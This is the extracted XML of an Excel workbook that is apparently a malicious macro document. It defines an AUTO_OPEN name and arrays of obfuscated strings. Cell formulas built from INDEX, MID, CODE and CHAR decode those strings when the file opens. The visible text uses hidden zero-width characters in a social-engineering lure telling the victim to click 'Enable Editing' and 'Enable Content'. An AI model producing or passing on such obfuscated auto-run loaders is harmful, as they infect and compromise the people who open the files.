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10" windowHeight="8280" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="AUTO_OPEN">'QaDPFjwdD'!$D$99</definedName>
    <definedName name="bnYnJMi">{"Þ£¢ãìæéÙºª§æÞØòÜáàâ”ãêå¡ª”ðãè”";"ß£¢ãìæéÙºª§æÞØòÜáàâ”ãêå¡ª”ðãè”";"¶¯Æ£ÁÅÇ»Í½½Ä¡¹Å¼ÊµÁŽ¢®ª”¥­ÅÏ¦ÉÈ¸ËÎÈ³¼«¨¬¡›¢’¬ÂÇÆÈŽÒ¬¬£¼š©¤";"µµº²Ì£šçëÒíêæ”¥ˆÕÍÄ¶èÝîççÓÝºïÁáÞÞ§¢§š¼Ã©ÃÅÂ”¥–¬à¤âŸˆîëä íÞô¤¢¥–©";"¸Á¸¡¸±®«µ­¢¾«¤žÀµÔÊ Äª™¶¾¬›¢";"£Ã¼Ä¾¡ˆõíäßèÔ¢§šÇË²ÄêïàåÕáßÌá¿Ïìà¹”¥ˆÊÅ»µÃ°¢§¨žß’ð¡šàéÒ®ïðæ›’°§¨›";"¶§ÌÀÊÆ¡ˆÔãÝ’ðÕòæÚáèÑ ÞÙàçÕô›Ú×™Õðàæ×Ý†ïí˜äÞÖáäê×Ý†âô˜¿âÉòêëáßÚ ÀðÕÞÒ ÝÝÕÚÛóà˜Ûíó›ÛáëØõëì ›";"á¸šÅáËìç½êÞÉõïÝ³›";"È½»¬Õ½ééÜáðÙÜîñåíËí®ªÎëÛîßäÞ¬˜®àð×›";"£Ã¼Ä¾¡ˆÓãÝÞå™²¤Ó¥ˆÊÅ»µ¼°Ê¤¢¥ˆïëÝà›’â§è˜›Ôðç¦æñÚ¬¿äÞËËçäëæÞØÓàêèÞØ¢§¨ž®";"?????????????";"¸¾ÁÉ«Î£è˜›ÛÕÔ¦èÛÙ¢§«›";"¶¬×ÍÁÆ¾²Î£Ê£­—Ã¯¤”ÇÈÂéÚÜñØ ¸˜”›ˆ¦àž”›ˆ¢¡æ˜›ÒÂÃÛ·è†½›š”›Œæ¡š”›ˆ©";"¸¾ÉË¯ÔÀÄÀ¡¸±¯©µ­’¢âÝ¶ÏÇô­ß’¶†ÁíêÓòŽÎÝºàÛÐøí¤Þ»®ãÀç››";"½ÁÏÄÂºÅÇÆšË—´¬»¦¥ˆÄäå’É­ÚÆ½ê­  ÎÝæ™¶ÇÕÃ·ñš ¸˜µëËáïÝÁÛÐåÞìš›ˆÍÎÐ¿Å˜®ÎÝäïËòÓÅ¾ÁºÔË¦¨§–¢¡”¢";"£ÆÒÊ»Í«ÌÉ Äªš±¾¬ž›¬õéÛæâÕî›áÈòŽäÜìÓ¢ ¢¡æ˜›¶ÇÕÃ·ñš®îÝæÈÖôäçà¡˜©›µ’ª™°°®”¢";"£ÆÒÊ»Í«ÌÉ Äªš±¾¬ž›¶ÇÕÃ·ñš®Êè×ç†¢¿·Íˆ¢§ÜÓíÇ¬ÁÙÞìË¢¤";"µ¸Ð¸ÉÏ½¾ÇŽÒ¬¬£¼š¬È¹Ó±Åó¬ ÌËîßš˜çŒ¢äÎë™£ Ë¿ÌÄ«ø¯¦ÅíÇôðë”ŸÔ¦½àÝ†ÆðæÕíÏïéš˜çŒ¢Áçä™«áÞà’òÍôôà¼Ê†éé˜ÙÞªÖÜì¤àˆ©";"¸¾ÉË¯ÔÀÄÀ¡¸±¯©µ­’¢ÄÞ’â¼ù£ñÙíßèÅÉ›™£ ­¨¢™ºèàæ”ŸÔ¦¼Ûæ†ùÃ­Þ³†Óàì’ò®µç˜¯™©òàÙæÞµâåÝÕíŽ¢¹¶ÈªÂ©ËæëËáèš”¢ˆ©";"¸¾ÉË¯ÔÀÄÀ¡¸±¯©µ­’¢ôÀ§å”ÏëÝà›Œî¡šëÁ›ì©ÌëéË ¸˜£›Œî¡šëÁ›ì©ÏäâÚå›È¹Ó±Åó¬ ËËóëçàìËÂêÜë›";"½ÁÏÄÂºÅÇÆšË—´¬»¦¥ˆùÃ­Þ§¹áñÝÆè¬éçÝ’›ˆ¢¡è˜›Ôðç¦æñÚ¢¤¤›Œî¡šëÁ›ì©»ÞèÙå¡";"¯¿½ÒÄÌ·Å´¨Í©¦ª©´§š·ñÏô›¾áëˆ¦éž”¾Ôä›ÁØ›Œî¡šÀÞÞô¡";"???????????????";"½ÀÐ·¼Ž¢àðâåÕòàê ÞÞå›š˜éŒ¢ðÍË§Üâîš›";"¶½ÈÄÄ·¡¯ÓÀÊÄÈ¸¨ÁÁ¾¾¹¨ëž”çÖì©ìêíˆ©¤¡";"¯Ð§ÉÏ ÀÈ½¨¤£”©–º«¨¬©—¢¤";"???????";"¯¿¯ÌÀ¦¶¾²ÅÏ½šéŒ¢ðÍË§Üâîš›";"¶½ÁÄÌšÇµ×£¡›–°µ¨¢³–²¡";"¯º²ÅÍÌš›ºèà˜éèØëÝçáä†ãÜæàèÚ ÝÝ’èÖåéÝÖ™Õò›ê×éÇéíÝÖ™Èù›ÅÛÜØïîçØí†ÅóÛ×å†âàÛÓîÙå›áæ™Ïó›ÛáëØõëì ›";"½ÁÇÂ¾´¨ëž”èÞ´©îÔìˆ¬®¡";"¯¿½ÒÄÌ·Å´¨Í©¨©©´§šÅÞÚ ÀÁáé×óÉÁ’¶†ÇàìÁÛÐåÞìš›ˆîàï¬¼–¸¼¾¶²–­Áª³ª“±¬¼£¦ž´°­Ÿ©–Á«»«ª¬³³°¢›ˆ©¡";"Ö¶ˆÅÄçâêÙÎÄ¦¶èÉõèÝàí”ÁëèÞâÉáïááç”ÓãÝÞå«øàÛçíË šäîÔäçä¥«”åóÝ”›’¢š";"¯¿½ÒÄÌ·Å´¨Í©¨©©´§Ü˜éŒ¢éèÞ§Úøï¤¶åÒÒàßÛìÚåíË×ëÜåíš”¥ˆ¢¾²ÎÐÏîßçéìÂÓôëæÞÓ³­š”¥´õçäž©ˆ©";"¸¾µÅµÓÀ Äªœ°¾¬›";"¶½ÁÄÌšÇµ×£¡›–°µ¨¢³–±¡";"¯¾¾Å¾ ”ÞÞðççäÞØ®àð×™ˆ¦ëž”èÞ´©îÔìˆ©";"?????????????"}</definedName>
    <definedName name="faxHKJ">'Sheet1'!$F$56</definedName>
    <definedName name="FDpHvh">0</definedName>
    <definedName name="ftSkiiXA">'Sheet1'!$G$56</definedName>
    <definedName name="HssxNaZ">'Sheet1'!$D$57</definedName>
    <definedName name="JTtJu">'Sheet1'!$B$49</definedName>
    <definedName name="OtZm">0</definedName>
    <definedName name="RFLv">0</definedName>
    <definedName name="TGjtDKx">'Sheet1'!$H$58</definedName>
    <definedName name="ThWDcqX">'Sheet1'!$C$44</definedName>
    <definedName name="uCewkxyg">'Sheet1'!$I$42</definedName>
    <definedName name="UGBhpIXC">{98;125;129;123;119;115;103;98;98;111}</definedName>
    <definedName name="vaFtDIgg">'Sheet1'!$A$46</definedName>
    <definedName name="vrmCFK">0</definedName>
    <definedName name="xcmYfrHs">'Sheet1'!$E$58</definedName>
    <definedName name="xcnuXi">{"ŸÆÏÏŸ´·²¼£ÕÊÈÀÍ¬Š‹˜®³«";"´¼µ¶Š¶§Ñ¯ÒÆÅ²µ²°¥Â©¬«œ¥•›Ÿ‹¨²«¨";"°°°¶—©ÂÕ©ÎÂ¹­µ¿£ÀÆ£«¥‹ ”´";"¾ÄÅÇ©§ÃÔÐÍÂÆ·£¥´Š®º¤ ž˜””";"¬«ËÕ£¾¸»¹¾´ÈÔË¸¶¬Š“¢‹»¹«§œ’““¨";"ŸËÐÒŸœ";"¤¹£¸¶¥ÏÊÎ›„Ÿ’·±«±£˜„‹";"??????";"°°°¶—ŠÏ²¬°¶›´ “´Ä¯ ˜’’Ÿ’­¿¬ ž˜“•";"ßŸŸÄµÓÈÚÇÔâ¾ÍöÝãÜÊ¾¦ÞÅòîàåçÚ¾„";"ÝŸÀÉ¼É›˜•‹";"¬¦ÂÇÄÅ¸•°£¼§¥£Ð¾µÏÒ«Ç¥Ÿ­›™°â„ˆÁ“®³¾«™‰„•´®²®º§„‘ˆÏ²¬«¶›ˆ„ª„£Ó¬¨¨ª–ˆ‘Ÿ§Í¨¤¥–•„¸£¡É¤™’¥£ˆŸþ ";"°«§¨¸°Â¯É¸À¬Š„çÅëöÓà•“ÄÐÈÐÇÎä ";"°«§¨¸°Â¯É¸À¬Š„´ÒêÒÃÑÃÈ„Ž •­ª";"";"¸»¸­«°´ËÂÈ¼›‰´¨»ØŸ­« ";"°«§¨¸°Â¯É¸À¬Š„¾Ö×î££";"ŸÙÐ­Àìé¸Á‹"}</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2" uniqueCount="2">
  <si>
    <t>‌T‌‌‌his ‎c​​o‌‌n‍‍‍t‍‍e‌‌nt‌‌‌ is‌‌ ‌‌‌pr​ote‌c‎‎‎t‎‎‎ed</t>
  </si>
  <si>
    <t>‍I‍‍‍n‎‎ ‎o‍r‎‎de‍r‎ to‎ ‌v​i‌‌e​w‌ ‍‍‍t‎‎h‎‎e‌‌‌ ‎‎c‌on‍t​​e‍‍n‍t‍,‍‍ ‌‌p‎‎‎l​ea‍‍‍s‌e‌ ‎‎cl‎‎‎ic‍‍‍k‍‍ ‍‍‍'E‌‌na​​​b‎‎‎l‌‌‌e ‍‍‍E​​dit​i‌‌n‍g'‌‌ ‎a‌n‌‌‌d ‌‌‌'‍En‍‍‍a‍‍‍b‎‎‎l‌e‎‎ ​​​C​o‌‌‌n‎‎‎t‌‌‌e​​​nt' ‎‎‎b‍‍‍u‎t​​​t‎‎‎o‌‌n​s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</si>
</sst>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5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6" ht="39">
      <c r="B6" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="39">
      <c r="B13" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="42" ht="15">
      <c r="I42" t="e">
        <f>CHAR(faxHKJ-TGjtDKx)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="44" ht="15">
      <c r="C44" t="str">
        <f>INDEX(xcnuXi,RFLv)</f>
        <v>ŸÆÏÏŸ´·²¼£ÕÊÈÀÍ¬Š‹˜®³«</v>
      </c>
    </row>
    <row r="46" ht="15">
      <c r="A46">
        <f>ROWS(xcnuXi)</f>
        <v>18</v>
      </c>
    </row>
    <row r="49" ht="15">
      <c r="B49">
        <f>ROWS(UGBhpIXC)</f>
        <v>10</v>
      </c>
    </row>
    <row r="56" spans="6:7" ht="15">
      <c r="F56" t="e">
        <f>CODE(xcmYfrHs)</f>
        <v>#VALUE!</v>
      </c>
      <c r="G56">
        <f>MOD(OtZm,JTtJu)+1</f>
        <v>1</v>
      </c>
    </row>
    <row r="57" ht="15">
      <c r="D57">
        <f>LEN(ThWDcqX)</f>
        <v>24</v>
      </c>
    </row>
    <row r="58" spans="5:8" ht="15">
      <c r="E58" t="e">
        <f>MID(ThWDcqX,vrmCFK,1)</f>
        <v>#VALUE!</v>
      </c>
      <c r="H58">
        <f>INDEX(UGBhpIXC,ftSkiiXA)</f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2020-12-02T14:47:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-02T14:47:56Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>